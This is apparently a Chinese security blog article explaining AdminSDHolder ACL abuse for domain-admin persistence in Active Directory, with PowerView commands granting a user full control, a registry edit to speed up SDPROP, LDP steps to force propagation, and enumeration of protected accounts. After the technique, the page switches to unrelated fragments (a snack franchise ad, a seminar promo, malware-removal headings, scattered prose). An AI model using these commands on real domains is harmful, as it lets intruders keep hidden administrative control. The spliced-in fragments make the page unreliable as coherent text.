AdminSDHolder是一个特殊的AD容器,通常作为某些特权组成员的对象的安全模板。Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组,以防止意外和无意的修改并确保对这些对象的访问是安全的。
本文由锦行科技的安全研究团队提供,旨在从攻击者的视角还原AdminSDHolder的渗透过程。
在域控上操作AdminSDHolder对象的ACL
添加用户test对AdminSDHolder的完全访问权限
powerview:
Add-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity test -Rights All
*由于SDPROP的原因,默认等待60分钟之后生效
Powerview:
Get-DomainObjectAcl adminsdholder | ?{$_.SecurityIdentifier -match "S-1-5-21-363618500-3918876104-3124729890-1139"} | select objectdn,ActiveDirectoryRights |sort -Unique
ADSI:
Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity test -Rights All -Verbose
为了将可继承ACE的更改传播到后代对象,域控制器运行一个称为安全描述符传播器(SDPROP)的后台任务。通过修改对象的安全描述符或移动对象时触发此任务。当修改了AdminSDHolder的ACL之后默认等待60分钟以后生效,原理是SDPROP进程在PDC模拟器上每60分钟运行一次,并使用AdminSDHolder设置的安全权限重新标记ACL。
修改成等待60秒
reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 60
运行->LDP.exe->菜单>连接->连接->服务器输入当前的机器名,端口默认为389
然后连接->绑定凭证->作为当前登录的用户绑定->然后浏览->修改,在属性选项卡中输入FixUpInheritance。在值字段中输入Yes。操作选择添加,然后单击输入,最后运行即可,运行。
已经获得域控权限,利用AdminSDHolder来进行权限维持,或者寻找受保护AD账户为目标。
枚举受保护AD账户
Get-NetUser -AdminCount |select samaccountname
登录test用户,可以看到test非域管组,却能执行域管权限的命令。
我们泛泛常常购置的点心零食是有许多种的,许多加盟商也想要加盟进去,可是加盟商不知道该如何举办选择,个中零下5度加盟项目是备受宽大消费者存眷的,零下5度加盟项目成长多年,品牌形象早就已经深入人心了,深受...
活动费用:免费(场地费AA制,电话咨询) 活动内容...收起 【主讲嘉宾】 格局生涯创始人赵正宝老师 神秘企业家嘉宾 格局优秀学员 【内容提纲】 1、2014是中国重大转折年,看懂了--...
本文目录一览: 1、如何删除恶意软件删除工具(微软的) 2、什么是灰鸽子?(黑客类) 3、电脑里有个叫hacker的文件老删不掉怎么办??? 4、手机黑客软件怎么现在真正的 如何删除恶意...
晚霞渐浓,红妆素色。子瑜拾一叶,藏于缥缃,归去。圣艺模特预约什么意思,一年四季的循环往复;白天和黑夜的循环往复;生死轮回的循环往复,造成了地久天长的循环系统。 女学妹怡宁简单自我介绍 先生们,我...
有些朋友电脑没有光驱,想要使用U盘重装,开机时却发现Bios设置里没有U盘启动项,着实让人着急;还有些朋友电脑的主板比较旧了,不支持U盘启动,碰到这些情况该怎么办呢?不用担心,本篇文章就适用于没有装光...
新闻宣传工作总结(2020年宣传工作总结) 人生就好象一场战斗,只要打好了这场仗,就等于战胜了自己,工作上用心做好每一件事,一步一个脚印脚踏实地,虽然没有惊天动地的业绩,也没有世人皆知的名誉,但却在...